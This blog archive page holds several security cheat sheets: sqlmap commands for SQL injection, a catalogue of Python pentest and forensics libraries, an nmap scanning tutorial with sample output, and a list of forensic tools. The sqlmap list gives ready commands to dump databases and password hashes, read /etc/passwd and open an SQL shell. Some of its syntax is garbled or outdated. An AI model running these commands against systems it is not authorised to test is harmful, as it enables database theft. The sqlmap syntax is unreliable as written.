Archive for the ‘Cheat sheets’ Category

Some useful sqlmap command for testing SQL injection vulnerability.

1) — Analyzing the current user is dba
python sqlmap.py -u “url” –is-dba -v 1
2) — users: user list database management system
python sqlmap.py -u “url” –users -v 0
3) — passwords: Database user password (hash)
python sqlmap.py -u “url” –passwords -v 0
python sqlmap.py -u “url” –passwords -U sa -v 0
4) To view the user permissions
python sqlmap.py -u “url” –privileges -v 0
python sqlmap.py -u “url” –privileges -U postgres -v 0
5) — dbs can use the database
python sqlmap.py -u “url” –dbs -v 0
6) — tables column in a table
python sqlmap.py -u “url” –tables -D “information_scheam”
-D: Specifies the name of the data
7) — columns are listed in the table column names
python sqlmap.py -u “url” –columns -T “user” -D “mysql” -v 1
-T: Specify the table name, -D: Specifies the library name
8) — dump the contents of the column specified in the list
python sqlmap.py -u “url” –dump -T “users” -D “testdb”
-C: You can specify fields
The specified column in the range of 2-4
python sqlmap.py -u “url” –dump -T “users” -D “testdb” –start 2 –stop 4 -v 0
9) — dumap-all List all databases, all tables content
python sqlmap.py -u “url” –dump-all -v 0
Only lists the contents of the user’s own new database and tables
python sqlmap.py -u “url” –dump-all –exclude-sysdbs -v 0
10) — file to read the content of the document [load_file () function]
python sqlmap.py -u “url” –file / etc / password
11) execute SQL
python sqlmap.py -u “url” –sql-shell
12) -p parameter specified
python sqlmap.py -u “url” -v 1 -p “id”
You can specify multiple -p parameter -p “cat, id”
13) POST submission
python sqlmap.py -u “url” –method POST –data “id = 1”
14) COOKIE Submit
python sqlmap.py -u “url” –cookie “id = 1” -v 1
cookie value can be crawled by the TamperData
15) refer to deceive
python sqlmap.py -u “url” –refer “url” -v 3
16) using a custom user-agent or user-agents.txt
python sqlmap.py -u “url” –user-agent “Mozilla / 4.0 (compatible; MSIE 7.0; Windows NT 5.1)” -v 3
python sqlmap.py -u “url” -v 1 -a “./txt/user-agents.txt”
17) use of multithreading guess solution
python sqlmap.py -u “url” -v 1 –current-user –threads 3
18) specify the database, bypassing the automatic detection SQLMAP
python sqlmap.py -u “url” -v 2 –dbms “PostgreSQL”
19) Specifies the operating system automatically detects the bypass SQLMAP
python sqlmap.py -u “url” -v 2 –os “Windows”
20) — prefix and –postfix custom payload
python sqlmap.py -u “url” -v 3 -p “id” –prefix ” ‘” –postfix “and’ test ‘=’ test”
21) union injection test
python sqlmap.py -u “url” –union-test -v -1
22) with the order by
python sqlmap.py -u “url” –union-test –union-tech orderby -v 1
23) python sqlmap.py -u “url” -v 1 –union-use –banner
24) python sqlmap.py -u “url” -v 5 –union-use –current-user
25) python sqlmap.py -u “url” -v 1 –union-use –dbs

Image result for python logo

If you are involved in vulnerability research, reverse engineering or penetration testing, I suggest to try out the Python programming language. It has a rich set of useful libraries and programs. This page lists some of them.
Most of the listed tools are written in Python, others are just Python bindings for existing C libraries, i.e. they make those libraries easily usable from Python programs.
Some of the more aggressive tools (pentest frameworks, bluetooth smashers, web application vulnerability scanners, war-dialers, etc.) are left out. This list is clearly meant to help whitehats, and for now I prefer to err on the safe side.

Network

  • ScapyScapy3k: send, sniff and dissect and forge network packets. Usable interactively or as a library
  • pypcapPcapy and pylibpcap: several different Python bindings for libpcap
  • libdnet: low-level networking routines, including interface lookup and Ethernet frame transmission
  • dpkt: fast, simple packet creation/parsing, with definitions for the basic TCP/IP protocols
  • Impacket: craft and decode network packets. Includes support for higher-level protocols such as NMB and SMB
  • pynids: libnids wrapper offering sniffing, IP defragmentation, TCP stream reassembly and port scan detection
  • Dirtbags py-pcap: read pcap files without libpcap
  • flowgrep: grep through packet payloads using regular expressions
  • Knock Subdomain Scan, enumerate subdomains on a target domain through a wordlist
  • SubBrute, fast subdomain enumeration tool
  • Mallory, extensible TCP/UDP man-in-the-middle proxy, supports modifying non-standard protocols on the fly
  • Pytbull: flexible IDS/IPS testing framework (shipped with more than 300 tests)
  • Spoodle: A mass subdomain + poodle vulnerability scanner
  • SMBMap: enumerate Samba share drives across an entire domain

Debugging and reverse engineering

  • Paimei: reverse engineering framework, includes PyDBG, PIDA, pGRAPH
  • Immunity Debugger: scriptable GUI and command line debugger
  • mona.py: PyCommand for Immunity Debugger that replaces and improves on pvefindaddr
  • IDAPython: IDA Pro plugin that integrates the Python programming language, allowing scripts to run in IDA Pro
  • PyEMU: fully scriptable IA-32 emulator, useful for malware analysis
  • pefile: read and work with Portable Executable (aka PE) files
  • pydasm: Python interface to the libdasm x86 disassembling library
  • PyDbgEng: Python wrapper for the Microsoft Windows Debugging Engine
  • uhooker: intercept calls to API calls inside DLLs, and also arbitrary addresses within the executable file in memory
  • diStorm: disassembler library for AMD64, licensed under the BSD license
  • python-ptrace: debugger using ptrace (Linux, BSD and Darwin system call to trace processes) written in Python
  • vdb / vtrace: vtrace is a cross-platform process debugging API implemented in python, and vdb is a debugger which uses it
  • Androguard: reverse engineering and analysis of Android applications
  • Capstone: lightweight multi-platform, multi-architecture disassembly framework with Python bindings
  • Keystone: lightweight multi-platform, multi-architecture assembler framework with Python bindings
  • PyBFD: Python interface to the GNU Binary File Descriptor (BFD) library
  • CHIPSEC: framework for analyzing the security of PC platforms including hardware, system firmware (BIOS/UEFI), and platform components.

Fuzzing

  • afl-python: enables American fuzzy lop fork server and instrumentation for pure-Python code
  • Sulley: fuzzer development and fuzz testing framework consisting of multiple extensible components
  • Peach Fuzzing Platform: extensible fuzzing framework for generation and mutation based fuzzing (v2 was written in Python)
  • antiparser: fuzz testing and fault injection API
  • TAOF, (The Art of Fuzzing) including ProxyFuzz, a man-in-the-middle non-deterministic network fuzzer
  • untidy: general purpose XML fuzzer
  • Powerfuzzer: highly automated and fully customizable web fuzzer (HTTP protocol based application fuzzer)
  • SMUDGE
  • Mistress: probe file formats on the fly and protocols with malformed data, based on pre-defined patterns
  • Fuzzbox: multi-codec media fuzzer
  • Forensic Fuzzing Tools: generate fuzzed files, fuzzed file systems, and file systems containing fuzzed files in order to test the robustness of forensics tools and examination systems
  • Windows IPC Fuzzing Tools: tools used to fuzz applications that use Windows Interprocess Communication mechanisms
  • WSBang: perform automated security testing of SOAP based web services
  • Construct: library for parsing and building of data structures (binary or textual). Define your data structures in a declarative manner
  • fuzzer.py (feliam): simple fuzzer by Felipe Andres Manzano
  • Fusil: Python library used to write fuzzing programs

Web

  • Requests: elegant and simple HTTP library, built for human beings
  • HTTPie: human-friendly cURL-like command line HTTP client
  • ProxMon: processes proxy logs and reports discovered issues
  • WSMap: find web service endpoints and discovery files
  • Twill: browse the Web from a command-line interface. Supports automated Web testing
  • Ghost.py: webkit web client written in Python
  • Windmill: web testing tool designed to let you painlessly automate and debug your web application
  • FunkLoad: functional and load web tester
  • spynner: Programmatic web browsing module for Python with Javascript/AJAX support
  • python-spidermonkey: bridge to the Mozilla SpiderMonkey JavaScript engine; allows for the evaluation and calling of Javascript scripts and functions
  • mitmproxy: SSL-capable, intercepting HTTP proxy. Console interface allows traffic flows to be inspected and edited on the fly
  • pathod / pathoc: pathological daemon/client for tormenting HTTP clients and servers

Forensics

  • Volatility: extract digital artifacts from volatile memory (RAM) samples
  • Rekall: memory analysis framework developed by Google
  • LibForensics: library for developing digital forensics applications
  • TrIDLib, identify file types from their binary signatures. Now includes Python binding
  • aft: Android forensic toolkit

Malware analysis

  • pyew: command line hexadecimal editor and disassembler, mainly to analyze malware
  • Exefilter: filter file formats in e-mails, web pages or files. Detects many common file formats and can remove active content
  • pyClamAV: add virus detection capabilities to your Python software
  • jsunpack-n, generic JavaScript unpacker: emulates browser functionality to detect exploits that target browser and browser plug-in vulnerabilities
  • yara-python: identify and classify malware samples
  • phoneyc: pure Python honeyclient implementation
  • CapTipper: analyse, explore and revive HTTP malicious traffic from PCAP file

PDF

  • peepdf: Python tool to analyse and explore PDF files to find out if they can be harmful
  • Didier Stevens’ PDF tools: analyse, identify and create PDF files (includes PDFiDpdf-parser and make-pdf and mPDF)
  • Opaf: Open PDF Analysis Framework. Converts PDF to an XML tree that can be analyzed and modified.
  • Origapy: Python wrapper for the Origami Ruby module which sanitizes PDF files
  • pyPDF2: pure Python PDF toolkit: extract info, spilt, merge, crop, encrypt, decrypt…
  • PDFMiner: extract text from PDF files
  • python-poppler-qt4: Python binding for the Poppler PDF library, including Qt4 support

Misc

  • InlineEgg: toolbox of classes for writing small assembly programs in Python
  • Exomind: framework for building decorated graphs and developing open-source intelligence modules and ideas, centered on social network services, search engines and instant messaging
  • RevHosts: enumerate virtual hosts for a given IP address
  • simplejson: JSON encoder/decoder, e.g. to use Google’s AJAX API
  • PyMangle: command line tool and a python library used to create word lists for use with other penetration testing tools
  • Hachoir: view and edit a binary stream field by field
  • py-mangle: command line tool and a python library used to create word lists for use with other penetration testing tools
  • wmiexec.py: execute Powershell commands quickly and easily via WMI
  • Pentestly: Python and Powershell internal penetration testing framework

Other useful libraries and tools

  • IPython: enhanced interactive Python shell with many features for object introspection, system shell access, and its own special command system
  • Beautiful Soup: HTML parser optimized for screen-scraping
  • matplotlib: make 2D plots of arrays
  • Mayavi: 3D scientific data visualization and plotting
  • RTGraph3D: create dynamic graphs in 3D
  • Twisted: event-driven networking engine
  • Suds: lightweight SOAP client for consuming Web Services
  • M2Crypto: most complete OpenSSL wrapper
  • NetworkX: graph library (edges, nodes)
  • Pandas: library providing high-performance, easy-to-use data structures and data analysis tools
  • pyparsing: general parsing module
  • lxml: most feature-rich and easy-to-use library for working with XML and HTML in the Python language
  • Whoosh: fast, featureful full-text indexing and searching library implemented in pure Python
  • Pexpect: control and automate other programs, similar to Don Libes `Expect` system
  • Sikuli, visual technology to search and automate GUIs using screenshots. Scriptable in Jython
  • PyQt and PySide: Python bindings for the Qt application framework and GUI library

Books

 

nmap

Nmap is a powerful network scanner used to identify systems and services. nmap was originally developed with network security in mind, it is a tool that was designed to find vulnerabilities within a network. nmap is more than just a simple port scanner though, you can use nmap to find specific versions of services, certain OS types, or even find that pesky printer someone put on your network without telling you.

nmap can be used for good and for evil, today we will cover some common situations where nmap makes life easier for sysadmins which is generally good. Even if some Sysadmins are evil…

Discover IP’s in a subnet (no root)

 $ nmap -sP 192.168.0.0/24
 Starting Nmap 7.30 ( http://nmap.org ) at 2016-10-12 21:12 GMT
 Nmap scan report for 192.168.0.1
 Host is up (0.0013s latency).
 Nmap scan report for 192.168.0.92
 Host is up (0.0032s latency).
 Nmap scan report for 192.168.0.113
 Host is up (0.0011s latency).

This is one of the simplest uses of nmap. This command is commonly refereed to as a “ping scan”, and tells nmap to send an icmp echo request, TCP SYN to port 443, TCP ACK to port 80 and icmp timestamp request to all hosts in the specified subnet. nmap will simply return a list of ip’s that responded. Unlike many nmap commands this particular one does not require root privileges, however when executed by root nmap will also by default send arp requests to the subnet.

Scan for open ports (no root)

 $ nmap 192.168.0.0/24
 Starting Nmap 7.30 ( http://nmap.org ) at 2016-10-12 21:20 GMT
Nmap scan report for 192.168.0.1 Host is up (0.0043s latency). Not shown: 998 closed ports PORT STATE SERVICE 80/tcp open http 443/tcp open https 

This scan is the default scan for nmap and can take some time to generate. With this scan nmap will attempt a TCP SYN connection to 1000 of the most common ports as well as an icmp echo request to determine if a host is up. nmap will also perform a DNS reverse lookup on the identified ip’s as this can sometimes be useful information.

Identify the Operating System of a host (requires root)

 # nmap -O 192.168.0.164
 Starting Nmap 7.30 ( http://nmap.org ) at 2016-10-12 21:35 GMT
 Nmap scan report for 192.168.0.112
 Host is up (0.00032s latency).
 Not shown: 996 closed ports
 PORT STATE SERVICE
 88/tcp open kerberos-sec
 139/tcp open netbios-ssn
 445/tcp open microsoft-ds
 631/tcp open ipp
 MAC Address: 00:00:00:00:00:00 (Unknown)
 Device type: general purpose
 Running: Apple Mac OS X 10.5.X
 OS details: Apple Mac OS X 10.5 - 10.6 (Leopard - Snow Leopard) (Darwin 9.0.0b5 - 10.0.0)
 Network Distance: 1 hop

With the -O option nmap will try to guess the targets operating system. This is accomplished by utilizing information that nmap is already getting through the TCP SYN port scan. This is usually a best guess but can actually be fairly accurate. The operating system scan however does require root privileges.

Identify Hostnames (no root)

 $ nmap -sL 192.168.0.0/24
 Starting Nmap 7.30 ( http://nmap.org ) at 2016-10-12 21:35 GMT
 Nmap scan report for 192.168.0.0
 Nmap scan report for router.local (192.168.0.1)
 Nmap scan report for fake.local (192.168.0.2)
 Nmap scan report for another.fake.local (192.168.0.3)

This is one of the most subtle commands of nmap, the -sL flag tells nmap to do a simple DNS query for the specified ip. This allows you to find hostnames for all of the ip’s in a subnet without having send a packet to the individual hosts themselves.

Hostname information can tell you a lot more about a network than you would think, for instance if you labeled your Active Directory Servers with ads01.domain.com you shouldn’t be surprised if someone guesses its use.

TCP Syn and UDP Scan (requires root)

 # nmap -sS -sU -PN 192.168.0.164
 Starting Nmap 7.30 ( http://nmap.org ) at 2016-10-12 21:12 GMT
 Nmap scan report for 192.168.0.112
 Host is up (0.00029s latency).
 Not shown: 1494 closed ports, 496 filtered ports
 PORT STATE SERVICE
 88/tcp open kerberos-sec
 139/tcp open netbios-ssn
 445/tcp open microsoft-ds
 631/tcp open ipp
 88/udp open|filtered kerberos-sec
 123/udp open ntp
 137/udp open netbios-ns
 138/udp open|filtered netbios-dgm
 631/udp open|filtered ipp
 5353/udp open zeroconf

The TCP SYN and UDP scan will take a while to generate but is fairly unobtrusive and stealthy. This command will check about 2000 common tcp and udp ports to see if they are responding. When you use the -Pn flag this tells nmap to skip the ping scan and assume the host is up. This can be useful when there is a firewall that might be preventing icmp replies.

TCP SYN and UDP scan for all ports (requires root)

 # nmap -sS -sU -PN -p 1-65535 192.168.0.164
 Starting Nmap 7.30 ( http://nmap.org ) at 2016-10-12 21:36 GMT
 Nmap scan report for 192.168.0.112
 Host is up (0.00021s latency).
 Not shown: 131051 closed ports
 PORT STATE SERVICE
 88/tcp open kerberos-sec
 139/tcp open netbios-ssn
 445/tcp open microsoft-ds
 631/tcp open ipp
 17500/tcp open unknown
 88/udp open|filtered kerberos-sec
 123/udp open ntp
 137/udp open netbios-ns
 138/udp open|filtered netbios-dgm
 631/udp open|filtered ipp
 5353/udp open zeroconf
 17500/udp open|filtered unknown
 51657/udp open|filtered unknown
 54658/udp open|filtered unknown
 57798/udp open|filtered unknown
 58488/udp open|filtered unknown
 60027/udp open|filtered unknown

This command is the same as above however by specifying the full port range from 1 to 65535 nmap will scan to see if the host is listening on all available ports. You can use the port range specification on any scan that performs a port scan.

TCP Connect Scan (no root)

 $ nmap -sT 192.168.0.164
 Starting Nmap 7.30 ( http://nmap.org ) at 2016-10-12 21:40 GMT
 Nmap scan report for 192.168.0.112
 Host is up (0.0015s latency).
 Not shown: 964 closed ports, 32 filtered ports
 PORT STATE SERVICE
 88/tcp open kerberos-sec
 139/tcp open netbios-ssn
 445/tcp open microsoft-ds
 631/tcp open ipp

This command is similar to the TCP SYN scan however rather than sending a SYN packet and reviewing the headers it will ask the OS to establish a TCP connection to the 1000 common ports.

Aggressively Scan Hosts (no root)

 $ nmap -T4 -A 192.168.0.0/24
 Nmap scan report for 192.168.0.67
 Host is up (0.00060s latency).
 Not shown: 996 closed ports
 PORT STATE SERVICE VERSION
 22/tcp open ssh OpenSSH 5.9p1 Debian 5ubuntu1 (protocol 2.0)
 | ssh-hostkey: 1024 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:6c (DSA)
 |_2048 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:6c (RSA)
 80/tcp open http nginx 1.1.19
 |_http-title: 403 Forbidden
 |_http-methods: No Allow or Public header in OPTIONS response (status code 405)
 111/tcp open rpcbind
 | rpcinfo:
 | program version port/proto service
 | 100000 2,3,4 111/tcp rpcbind
 | 100000 2,3,4 111/udp rpcbind
 | 100003 2,3,4 2049/tcp nfs
 | 100003 2,3,4 2049/udp nfs
 | 100005 1,2,3 46448/tcp mountd
 | 100005 1,2,3 52408/udp mountd
 | 100021 1,3,4 35394/udp nlockmgr
 | 100021 1,3,4 57150/tcp nlockmgr
 | 100024 1 49363/tcp status
 | 100024 1 51515/udp status
 | 100227 2,3 2049/tcp nfs_acl
 |_ 100227 2,3 2049/udp nfs_acl
 2049/tcp open nfs (nfs V2-4) 2-4 (rpc #100003)
 Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Unlike some of the earlier commands this command is very aggressive and very obtrusive. The -A simply tells nmap to perform OS checking and version checking. The -T4 is for the speed template, these templates are what tells nmap how quickly to perform the scan. The speed template ranges from 0 for slow and stealthy to 5 for fast and obvious.

Fast Scan (no root)

 $ nmap -T4 -F 192.168.0.138
 Starting Nmap 7.30 ( http://nmap.org ) at 2016-10-12 21:48 GMT
 Nmap scan report for 192.168.0.112
 Host is up (0.00047s latency).
 Not shown: 96 closed ports
 PORT STATE SERVICE
 88/tcp open kerberos-sec
 139/tcp open netbios-ssn
 445/tcp open microsoft-ds
 631/tcp open ipp

This scan limits the scan to the most common 100 ports, if you simply want to know some potential hosts with ports open that shouldn’t be this is a quick and dirty command to use.

Verbose

 $ nmap -T4 -A -v 192.168.0.164
 Starting Nmap 7.30 ( http://nmap.org ) at 2016-10-12 21:50 GMT
 NSE: Loaded 93 scripts for scanning.
 NSE: Script Pre-scanning.
 Initiating Ping Scan at 21:50
 Scanning 192.168.0.164 [2 ports]
 Completed Ping Scan at 21:50, 0.00s elapsed (1 total hosts)
 Initiating Parallel DNS resolution of 1 host. at 21:50
 Completed Parallel DNS resolution of 1 host. at 21:50, 0.01s elapsed
 Initiating Connect Scan at 21:50
 Scanning 192.168.0.187 [1000 ports]
 Discovered open port 139/tcp on 192.168.0.164
 Discovered open port 445/tcp on 192.168.0.164
 Discovered open port 88/tcp on 192.168.0.164
 Discovered open port 631/tcp on 192.168.0.164
 Completed Connect Scan at 21:50, 5.22s elapsed (1000 total ports)
 Initiating Service scan at 21:50
 Scanning 4 services on 192.168.0.164
 Completed Service scan at 21:51, 11.00s elapsed (4 services on 1 host)
 NSE: Script scanning 192.168.0.164.
 Initiating NSE at 21:51
 Completed NSE at 21:51, 12.11s elapsed
 Nmap scan report for 192.168.0.164
 Host is up (0.00026s latency).
 Not shown: 996 closed ports
 PORT STATE SERVICE VERSION
 88/tcp open kerberos-sec Mac OS X kerberos-sec
 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
 631/tcp open ipp CUPS 1.4
 | http-methods: GET HEAD OPTIONS POST PUT
 | Potentially risky methods: PUT
 |_See http://nmap.org/nsedoc/scripts/http-methods.html
 | http-robots.txt: 1 disallowed entry
 |_/
 Service Info: OS: Mac OS X; CPE: cpe:/o:apple:mac_os_x

By adding verbose to a majority of the commands above you get a better insight into what nmap is doing; for some scans verbosity will provide additional details that the report does not provide.
While these are 10 very useful nmap commands I am sure there are some more handy nmap examples out there. If you have one to add to this list feel free to drop it into a comment.

Performing a nMap Scan

tv-justice

Here is some help for you guys and gals that are looking for some forensic tools, they can also be good fun to mess around with.

1. Disk tools and data capture

————————————————————————————————————–
Arsenal Image Mounter :
Mounts disk images as complete disks in Windows, giving access to Volume Shadow Copies, etc.
https://www.arsenalrecon.com/apps/image-mounter/
————————————————————————————————————–
DumpIt :
Generates physical memory dump of Windows machines, 32 bits 64 bit. Can run from a USB flash drive.
http://www.moonsols.com/2011/07/18/moonsols-dumpit-goes-mainstream/
————————————————————————————————————–
EnCase :
Create EnCase evidence files and EnCase logical evidence files
http://www1.guidancesoftware.com/Order-Forensic-Imager.aspx
————————————————————————————————————–
Encrypted Disk Detector :
Checks local physical drives on a system for TrueCrypt, PGP, or Bitlocker encrypted volumes
http://info.magnetforensics.com/encrypted-disk-detector
————————————————————————————————————–
EWF MetaEditor :
Edit EWF (E01) meta data, remove passwords (Encase v6 and earlier)
http://www.4discovery.com/our-tools/
————————————————————————————————————–
FAT32 Format :
Enables large capacity disks to be formatted as FAT32
http://www.ridgecrop.demon.co.uk/index.htm?fat32format.htm
————————————————————————————————————–
Forensics Acquisition of Websites :
Browser designed to forensically capture web pages
http://www.fawproject.com/en/default.aspx
————————————————————————————————————–
FTK Imager :
Imaging tool, disk viewer and image mounter
http://www.accessdata.com/support/product-downloads
————————————————————————————————————–
Guymager :
Multi-threaded GUI imager under running under Linux
http://guymager.sourceforge.net/
————————————————————————————————————–
Live RAM Capturer :
Extracts RAM dump including that protected by an anti-debugging or anti-dumping system. 32 and 64 bit builds
http://forensic.belkasoft.com/en/ram-capturer
————————————————————————————————————–
NetworkMiner :
Network analysis tool. Detects OS, hostname and open ports of network hosts through packet sniffing/PCAP parsing
http://sourceforge.net/projects/networkminer/
————————————————————————————————————–
Nmap :
Utility for network discovery and security auditing
http://nmap.org/
————————————————————————————————————–
Magnet RAM :
Captures physical memory of a suspect’s computer. Windows XP to Windows 10, and 2003, 2008, 2012. 32 & 64 bit
http://www.magnetforensics.com/ram-capture/
————————————————————————————————————–
OSFClone :
Boot utility for CD/DVD or USB flash drives to create dd or AFF images/clones.
http://www.osforensics.com/tools/create-disk-images.html
————————————————————————————————————–
OSFMount :
Mounts a wide range of disk images. Also allows creation of RAM disks
http://www.osforensics.com/tools/mount-disk-images.html
————————————————————————————————————–
Wireshark :
Network protocol capture and analysis
https://www.wireshark.org/
————————————————————————————————————–
Disk2vhd :
Creates Virtual Hard Disks versions of physical disks for use in Microsoft Virtual PC or Microsoft Hyper-V VMs
https://technet.microsoft.com/en-gb/sysinternals/ee656415.aspx

————————————————————————————————————–
2. Email analysis

————————————————————————————————————–
EDB Viewer :
Open and view (not export) Outlook EDB files without an Exchange server
http://www.nucleustechnologies.com/exchange-edb-viewer.html
————————————————————————————————————–
Mail Viewer :
Viewer for Outlook Express, Windows Mail/Windows Live Mail, Mozilla Thunderbird message databases and single EML files
http://www.mitec.cz/mailview.html
————————————————————————————————————–
MBOX Viewer :
View MBOX emails and attachments
http://www.systoolsgroup.com/mbox-viewer.html
————————————————————————————————————–
OST Viewer  :
Open and view (not export) Outlook OST files without connecting to an Exchange server
http://www.nucleustechnologies.com/ost-viewer.html
————————————————————————————————————–
PST Viewer  :
Open and view (not export) Outlook PST files without needing Outlook
http://www.nucleustechnologies.com/pst-viewer.html
————————————————————————————————————–
3. General tools

————————————————————————————————————–
Agent Ransack :
Search multiple files using Boolean operators and Perl Regex
http://www.mythicsoft.com/page.aspx?type=agentransack&page=home
————————————————————————————————————–
Computer Forensic Reference Data Sets :
Collated forensic images for training, practice and validation
http://www.cfreds.nist.gov/
————————————————————————————————————–
EvidenceMover :
Copies data between locations, with file comparison, verification, logging
http://www.nuix.com/Nuix-evidence-mover
————————————————————————————————————–
FastCopy :
Self labelled ‘fastest’ copy/delete Windows software. Can verify with SHA-1, etc.
http://ipmsg.org/tools/fastcopy.html.en
————————————————————————————————————–
File Signatures :
Table of file signatures
http://www.garykessler.net/library/file_sigs.html
————————————————————————————————————–
HexBrowser :
Identifies over 1000 file types by examining their signatures
http://www.hexbrowser.com/
————————————————————————————————————–
HashMyFiles :
Calculate MD5 and SHA1 hashes
http://www.nirsoft.net/utils/hash_my_files.html
————————————————————————————————————–
MobaLiveCD :
Run Linux live CDs from their ISO image without having to boot to them
http://mobalivecd-en.mobatek.net/
————————————————————————————————————–
Mouse Jiggler :
Automatically moves mouse pointer stopping screen saver, hibernation etc.
http://mousejiggler.codeplex.com/
————————————————————————————————————–
Notepad ++ :
Advanced Notepad replacement
http://notepad-plus-plus.org/
————————————————————————————————————–
NSRL :
Hash sets of ‘known’ (ignorable) files
http://www.nsrl.nist.gov/Downloads.htm
————————————————————————————————————–
Quick Hash :
A Linux & Windows GUI for individual and recursive SHA1 hashing of files
http://sourceforge.net/projects/quickhash/
————————————————————————————————————–
USB Write Blocker :
Enables software write-blocking of USB ports
http://dsicovery.com/dsicovery-software/usb-write-blocker/
————————————————————————————————————–
Volix :
Application that simplifies the use of the Volatility Framework
http://www.it-forensik.fh-aachen.de/projekte/volix/13
————————————————————————————————————–
Windows Forensic Environment :
Guide by Brett Shavers to creating and working with a Windows boot CD
http://winfe.wordpress.com/
————————————————————————————————————–
4. File and data analysis

————————————————————————————————————–
Advanced Prefetch Analyser :
Reads Windows XP,Vista and Windows 7 prefetch files
http://www.ash368.com/
————————————————————————————————————–
analyzeMFT :
Parses the MFT from an NTFS file system allowing results to be analysed with other tools
https://github.com/dkovar/analyzeMFT
————————————————————————————————————–
bstrings :
Find strings in binary data, including regular expression searching.
https://binaryforay.blogspot.co.uk/2015/07/introducing-bstrings-better-strings.html
————————————————————————————————————–
CapAnalysis :
PCAP viewer
http://www.capanalysis.net/site/
————————————————————————————————————–
Crowd Reponse :
Windows console application to aid gathering of system information for incident response and security engagements.
http://www.crowdstrike.com/community-tools/
————————————————————————————————————–
Crowd Inspect :
Details network processes, listing binaries associated with each process. Queries VirusTotal, other malware repositories & reputation services to produce “at-a-glance” state of the system
http://www.crowdstrike.com/community-tools/
————————————————————————————————————–
DCode :
Converts various data types to date/time values
http://www.digital-detective.net/digital-forensic-software/free-tools/
————————————————————————————————————–
Defraser :
Detects full and partial multimedia files in unallocated space
http://sourceforge.net/projects/defraser/
————————————————————————————————————–
eCryptfs Parser :
Recursively parses headers of every eCryptfs file in selected directory. Outputs encryption algorithm used, original file size, signature used, etc.
http://sourceforge.net/projects/ecryptfs-p/
————————————————————————————————————–
Encryption Analyzer :
Scans a computer for password-protected & encrypted files, reports encryption complexity and decryption options for each file
http://www.lostpassword.com/encryption-analyzer.htm
————————————————————————————————————–
ExifTool :
Read, write and edit Exif data in a large number of file types
http://www.sno.phy.queensu.ca/~phil/exiftool/
————————————————————————————————————–
File Identifier :
Drag and drop web-browser JavaScript tool for identification of over 2000 file types
http://www.toolsley.com/
————————————————————————————————————–
Forensic Image Viewer :
View various picture formats, image enhancer, extraction of embedded Exif, GPS data
http://www.sandersonforensics.com/forum/list.php?category/46-Free-Software
————————————————————————————————————–
Ghiro :
In-depth analysis of image (picture) files
http://www.getghiro.org/
————————————————————————————————————–
Highlighter :
Examine log files using text, graphic or histogram views
http://www.mandiant.com/products/free_software/highlighter/
————————————————————————————————————–
Link Parser :
Recursively parses folders extracting 30+ attributes from Windows .lnk (shortcut) files
http://www.4discovery.com/our-tools/
————————————————————————————————————–
LiveContactsView :
View and export Windows Live Messenger contact details
http://www.nirsoft.net/utils/live_messenger_contacts.html
————————————————————————————————————–
PECmd :
Prefetch Explorer
https://binaryforay.blogspot.co.uk/2016/01/pecmd-v0600-released.html
————————————————————————————————————–
PlatformAuditProbe :
Command Line Windows forensic/ incident response tool that collects many artefacts. Manual
https://appliedalgo.com/
————————————————————————————————————–
RSA Netwitness Investigator :
Network packet capture and analysis
http://www.emc.com/security/rsa-netwitness.htm#!freeware
————————————————————————————————————–
Memoryze :
Acquire and/or analyse RAM images, including the page file on live systems
http://www.mandiant.com/products/free_software/memoryze/
————————————————————————————————————–
MetaExtractor :
Recursively parses folders to extract meta data from MS Office, OpenOffice and PDF files
http://www.4discovery.com/our-tools/
————————————————————————————————————–
MFTview :
Displays and decodes contents of an extracted MFT file
http://www.sandersonforensics.com/forum/list.php?category/46-Free-Software
————————————————————————————————————–
PictureBox :
Lists EXIF, and where available, GPS data for all photographs present in a directory. Export data to .xls or Google Earth KML format
http://www.mikesforensictools.co.uk/MFTPB.html
————————————————————————————————————–
PsTools :
Suite of command-line Windows utilities
http://technet.microsoft.com/en-us/sysinternals/bb896649.aspx
————————————————————————————————————–
Shadow Explorer :
Browse and extract files from shadow copies
http://www.shadowexplorer.com/
————————————————————————————————————–
SQLite Manager :
Firefox add-on enabling viewing of any SQLite
https://addons.mozilla.org/en-US/firefox/addon/sqlite-manager/
————————————————————————————————————–
Strings :
Command-line tool for text searches
http://technet.microsoft.com/en-gb/sysinternals/bb897439.aspx
————————————————————————————————————–
Structured Storage Viewer :
View and manage MS OLE Structured Storage based files
http://www.mitec.cz/ssv.html
————————————————————————————————————–
Switch-a-Roo :
Text replacement/converter/decoder for when dealing with URL encoding, etc
http://www.mikesforensictools.co.uk/MFTSAR.html
————————————————————————————————————–
Windows File Analyzer :
Analyse thumbs.db, Prefetch, INFO2 and .lnk files
http://www.mitec.cz/wfa.html
————————————————————————————————————–
Xplico :
Network forensics analysis tool
http://www.xplico.org/
————————————————————————————————————–
5. Mac OS tools

————————————————————————————————————–
Audit :
Audit Preference Pane and Log Reader for OS X
https://github.com/twocanoes/audit
————————————————————————————————————–
ChainBreaker :
Parses keychain structure, extracting user’s confidential information such as application account/password, encrypted volume password (e.g. filevault), etc
http://forensic.n0fate.com/?page_id=412
————————————————————————————————————–
Disk Arbitrator :
Blocks the mounting of file systems, complimenting a write blocker in disabling disk arbitration
https://github.com/aburgh/Disk-Arbitrator
————————————————————————————————————–
Epoch Converter :
Converts epoch times to local time and UTC
https://www.blackbagtech.com/resources/freetools/epochconverter.html
————————————————————————————————————–
FTK Imager CLI for Mac OS :
Command line Mac OS version of AccessData’s FTK Imager
http://accessdata.com/product-download/digital-forensics/mac-os-10.5-and-10.6x-version-3.1.1
————————————————————————————————————–
IORegInfo :
Lists items connected to the computer (e.g., SATA, USB and FireWire Drives, software RAID sets). Can locate partition information, including sizes, types, and the bus to which the device is connected
https://www.blackbagtech.com/resources/freetools/ioreg-info.html
————————————————————————————————————–
PMAP Info :
Displays the physical partitioning of the specified device. Can be used to map out all the drive information, accounting for all used sectors
https://www.blackbagtech.com/resources/freetools/pmap-info.html
————————————————————————————————————–
Volafox :
Memory forensic toolkit for Mac OS X
http://forensic.n0fate.com/?page_id=412
————————————————————————————————————–
6. Mobile devices

————————————————————————————————————–
iPBA2 :
Explore iOS backups
http://ipbackupanalyzer.com/
————————————————————————————————————–
iPhone Analyzer :
Explore the internal file structure of Pad, iPod and iPhones
http://sourceforge.net/projects/iphoneanalyzer/
————————————————————————————————————–
